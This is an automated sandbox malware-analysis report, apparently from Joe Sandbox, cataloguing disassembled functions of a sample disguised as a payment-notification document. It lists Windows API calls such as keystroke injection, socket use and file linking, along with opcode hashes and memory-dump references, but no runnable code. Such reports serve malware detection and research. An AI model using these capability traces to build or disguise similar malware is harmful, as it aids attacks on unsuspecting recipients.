                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: 33db41532a0e7ac4da6ddbe3a12b75bc7b7dd8ef280580b4940a0172b857038f
                                                                              • Instruction ID: 41b57ecb5a83baf6cabb7e7de5f8e4894489d1b54abe52abeeb126b6bc9500f0
                                                                              • Opcode Fuzzy Hash: 33db41532a0e7ac4da6ddbe3a12b75bc7b7dd8ef280580b4940a0172b857038f
                                                                              • Instruction Fuzzy Hash: F721B073610118BBEF118F54CC85FAB376EEF89764F10C114F9089B190C671DC5297A0
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00954A08
                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00954A5C
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,0097CC08), ref: 00954AD0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume
                                                                              • String ID: %lu
                                                                              • API String ID: 2507767853-685833217
                                                                              • Opcode ID: e96bd08b8e63a2cce8f4c3d60366269800e8357efb479ae700b6a9ae56d683b6
                                                                              • Instruction ID: 48e1c76efc9cacd0eb85b10e9d6974a897a4c66f71fc10f414eba1c42d79f59b
                                                                              • Opcode Fuzzy Hash: e96bd08b8e63a2cce8f4c3d60366269800e8357efb479ae700b6a9ae56d683b6
                                                                              • Instruction Fuzzy Hash: CA319171A00108AFDB50DF68C881EAE7BF8EF49308F1480A8F909DB252D771ED85CB61
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0097424F
                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00974264
                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00974271
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: msctls_trackbar32
                                                                              • API String ID: 3850602802-1010561917
                                                                              • Opcode ID: 7f3bf888f23b1ee078984f1650eea93ca23d74249ff4dcc165b4fd2ded4f7566
                                                                              • Instruction ID: f39e6257e8410f108ee74142c0b0012b96d01b82f48c3703d89757dfdd460d9a
                                                                              • Opcode Fuzzy Hash: 7f3bf888f23b1ee078984f1650eea93ca23d74249ff4dcc165b4fd2ded4f7566
                                                                              • Instruction Fuzzy Hash: A8110632344248BEEF205F69CC06FAB3BACEF95B64F114514FA59E20A1D371DC619B54
                                                                              APIs
                                                                                • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                                • Part of subcall function 00942DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00942DC5
                                                                                • Part of subcall function 00942DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00942DD6
                                                                                • Part of subcall function 00942DA7: GetCurrentThreadId.KERNEL32 ref: 00942DDD
                                                                                • Part of subcall function 00942DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00942DE4
                                                                              • GetFocus.USER32 ref: 00942F78
                                                                                • Part of subcall function 00942DEE: GetParent.USER32(00000000), ref: 00942DF9
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00942FC3
                                                                              • EnumChildWindows.USER32(?,0094303B), ref: 00942FEB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                              • String ID: %s%d
                                                                              • API String ID: 1272988791-1110647743
                                                                              • Opcode ID: 3b202b976d325215b3e3d8ebc8ae80e908124ba3af4fc9479770cd4931ecbecb
                                                                              • Instruction ID: b303d665162da122b7855239dc4149a0b14891e51c7f955261655ee329122907
                                                                              • Opcode Fuzzy Hash: 3b202b976d325215b3e3d8ebc8ae80e908124ba3af4fc9479770cd4931ecbecb
                                                                              • Instruction Fuzzy Hash: E111AFB1600205ABCF157F748C85FEE37AAFFD4318F048079B909EB292DE3099499B60
                                                                              APIs
                                                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009758C1
                                                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009758EE
                                                                              • DrawMenuBar.USER32(?), ref: 009758FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$InfoItem$Draw
                                                                              • String ID: 0
                                                                              • API String ID: 3227129158-4108050209
                                                                              • Opcode ID: b70e55c367d243d23148d54a3a6927e30e9ffacb0cc462dfd583b36f1907cf6c
                                                                              • Instruction ID: 6c94997b93967bfa33a2e4af37d7ba398b1f5d8a49a9fd1b694d16d287dd8b8a
                                                                              • Opcode Fuzzy Hash: b70e55c367d243d23148d54a3a6927e30e9ffacb0cc462dfd583b36f1907cf6c
                                                                              • Instruction Fuzzy Hash: 44017932504208EFDB609F21D844BAABBB8FF45360F008099FA4DDA161DB708A84AF21
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0093D3BF
                                                                              • FreeLibrary.KERNEL32 ref: 0093D3E5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeLibraryProc
                                                                              • String ID: GetSystemWow64DirectoryW$X64
                                                                              • API String ID: 3013587201-2590602151
                                                                              • Opcode ID: 134b892a42bb18fbb2cb83b23dce0020e0eb98eb7fdc5dc19ba9338d48214a0e
                                                                              • Instruction ID: 79059795b4d3256436d6ec76e1ce3b3fbdc4a4db29ce02244dcfb01a1cf53a98
                                                                              • Opcode Fuzzy Hash: 134b892a42bb18fbb2cb83b23dce0020e0eb98eb7fdc5dc19ba9338d48214a0e
                                                                              • Instruction Fuzzy Hash: F9F055B690BB218BD37112206C38AAE3359AF00705F988429F916E2045EB20CE80CEC2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2c08788c1616eee6f559080739ba74115317d1da74d2ee4bc3372bb30bf9fb50
                                                                              • Instruction ID: 6f4455df1ddaa773d6f3347347a11d1769cea07ca7f0176ffa878d7175a9755b
                                                                              • Opcode Fuzzy Hash: 2c08788c1616eee6f559080739ba74115317d1da74d2ee4bc3372bb30bf9fb50
                                                                              • Instruction Fuzzy Hash: 9FC14C75A0020AEFDB14CFA4C894EAEBBB5FF88704F108598E615EB251D771ED41DB90
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: __alldvrm$_strrchr
                                                                              • String ID:
                                                                              • API String ID: 1036877536-0
                                                                              • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                              • Instruction ID: 6987746c2fa5abe8163f56348689659d9ad3bffef2560c04cc6ae534b07079b0
                                                                              • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                              • Instruction Fuzzy Hash: 55A11672F0438AAFEB158F19C8917EABBF9EF69350F14416DE5959B281C23889C2C750
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInitInitializeUninitialize
                                                                              • String ID:
                                                                              • API String ID: 1998397398-0
                                                                              • Opcode ID: fc58a562cc6c689ef1677ba1943ae8c353a67cfb391a291118556b6951d926a8
                                                                              • Instruction ID: ecac808ce0df68c75a58b93e2774b1c73534628f298cb2c65074fdefdf8aa075
                                                                              • Opcode Fuzzy Hash: fc58a562cc6c689ef1677ba1943ae8c353a67cfb391a291118556b6951d926a8
                                                                              • Instruction Fuzzy Hash: DAA116756047009FC710DF29C985A2AB7E9FF89714F048859F98ADB362DB30EE05CB92
                                                                              APIs
                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0097FC08,?), ref: 009405F0
                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0097FC08,?), ref: 00940608
                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,0097CC40,000000FF,?,00000000,00000800,00000000,?,0097FC08,?), ref: 0094062D
                                                                              • _memcmp.LIBVCRUNTIME ref: 0094064E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                              • String ID:
                                                                              • API String ID: 314563124-0
                                                                              • Opcode ID: 6a6cff8cb18c1f6a890a69f8b3985efdef4c7a6cb33c7e21c4878febcb0ba6fd
                                                                              • Instruction ID: d7a443dfd0a0f255739ba4871becaefedcd52c51e39ba9ba7696ab9cc0501251
                                                                              • Opcode Fuzzy Hash: 6a6cff8cb18c1f6a890a69f8b3985efdef4c7a6cb33c7e21c4878febcb0ba6fd
                                                                              • Instruction Fuzzy Hash: 8281F975A00109EFCB04DF94C984EEEB7B9FF89315F204598F606AB250DB71AE46CB61
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              • Opcode ID: 8cd172302c2ba53d20598fd0976e3db2a8b55795d44cbd0d84287f16eebc19be
                                                                              • Instruction ID: 26edc3317f2c714eba2aa19562f741a4caab0168c32c480b54107ddb10fa17b7
                                                                              • Opcode Fuzzy Hash: 8cd172302c2ba53d20598fd0976e3db2a8b55795d44cbd0d84287f16eebc19be
                                                                              • Instruction Fuzzy Hash: CD416C31A00125AFDB357BFDBC45BBE3AA8EFE1370F144226F42CD61E5E63449A152A1
                                                                              APIs
                                                                              • GetWindowRect.USER32(0199F7A8,?), ref: 009762E2
                                                                              • ScreenToClient.USER32(?,?), ref: 00976315
                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00976382
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientMoveRectScreen
                                                                              • String ID:
                                                                              • API String ID: 3880355969-0
                                                                              • Opcode ID: c29f466e4ac074ea2a55d9ed15847792385ba33239d31335fbbeb257a57a3b38
                                                                              • Instruction ID: f6ad3acf272682f561cce66a65d2e39598ff34eb2fc385d739145ff26a36f0c5
                                                                              • Opcode Fuzzy Hash: c29f466e4ac074ea2a55d9ed15847792385ba33239d31335fbbeb257a57a3b38
                                                                              • Instruction Fuzzy Hash: 8B514C72A00649AFCF14DF68D980AAE7BB9FF85360F108259F819972A0D730ED81DB50
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00961AFD
                                                                              • WSAGetLastError.WSOCK32 ref: 00961B0B
                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00961B8A
                                                                              • WSAGetLastError.WSOCK32 ref: 00961B94
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$socket
                                                                              • String ID:
                                                                              • API String ID: 1881357543-0
                                                                              • Opcode ID: 1b9efd61b95ed3a13337afde917d322704a139b11386abfcfbdf3eb636675305
                                                                              • Instruction ID: 70146b392454769c4e944f3344cadceeeafd5ffa5ed7667d09ac0e33424323b3
                                                                              • Opcode Fuzzy Hash: 1b9efd61b95ed3a13337afde917d322704a139b11386abfcfbdf3eb636675305
                                                                              • Instruction Fuzzy Hash: 2D419075600200AFE720AF39C886F2A77E5EB45718F588458FA1A9F3D3D772DD428B91
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 58bba937667f69e834bffe38574f8391edf13e5b4d3da64c8287ba8adb51399e
                                                                              • Instruction ID: 9d3145677659bca4cd52a5085324674074f963cae57e7d1794f7c68c536ba48d
                                                                              • Opcode Fuzzy Hash: 58bba937667f69e834bffe38574f8391edf13e5b4d3da64c8287ba8adb51399e
                                                                              • Instruction Fuzzy Hash: 0D410871B00318AFD724AF78CC41BAABBEAEBC8710F10852EF156DB6D1D77199918790
                                                                              APIs
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00955783
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 009557A9
                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009557CE
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009557FA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 3321077145-0
                                                                              • Opcode ID: 3ad9a2523867e59c2c60a6a0896506ace67c3628a291241bd61a1241aff81c00
                                                                              • Instruction ID: 21e83da1695cfd5f498cde62c5b9eb4f9271431bd57f210d2cce71045818fa54
                                                                              • Opcode Fuzzy Hash: 3ad9a2523867e59c2c60a6a0896506ace67c3628a291241bd61a1241aff81c00
                                                                              • Instruction Fuzzy Hash: 7C412D35600A50DFCB11DF1AC444A1EBBE5FF89321B198488ED5A9B362CB34FD45CB91
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00906D71,00000000,00000000,009082D9,?,009082D9,?,00000001,00906D71,8BE85006,00000001,009082D9,009082D9), ref: 0091D910
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0091D999
                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0091D9AB
                                                                              • __freea.LIBCMT ref: 0091D9B4
                                                                                • Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                              • String ID:
                                                                              • API String ID: 2652629310-0
                                                                              • Opcode ID: 0c48abd95cf552bcb5e718d5e18b60ab45ace04d88d810477af643eace62501c
                                                                              • Instruction ID: c30ff670d3e7fec24622388258bba52c394b7fd1418eec9d5e3f7d959e8db187
                                                                              • Opcode Fuzzy Hash: 0c48abd95cf552bcb5e718d5e18b60ab45ace04d88d810477af643eace62501c
                                                                              • Instruction Fuzzy Hash: 3A31AD72B1221AABDF249F65DC45EEE7BA9EB41710B054168FC04D6290EB35DD90CBA0
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00975352
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00975375
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00975382
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009753A8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$InvalidateMessageRectSend
                                                                              • String ID:
                                                                              • API String ID: 3340791633-0
                                                                              • Opcode ID: 41365cf2628503d12793a1f55a192cc0e82ca2b0ff640502661941349242ebfc
                                                                              • Instruction ID: 709dca058d738d3262a8f41ff499b206a5cf2450fd416bf531b8640dc12ac0ba
                                                                              • Opcode Fuzzy Hash: 41365cf2628503d12793a1f55a192cc0e82ca2b0ff640502661941349242ebfc
                                                                              • Instruction Fuzzy Hash: BF31E432B55A08EFEB749A14CC56BE83769AB043D0F598505FA18961F0C7F5AD80EB41
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0094ABF1
                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 0094AC0D
                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 0094AC74
                                                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0094ACC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
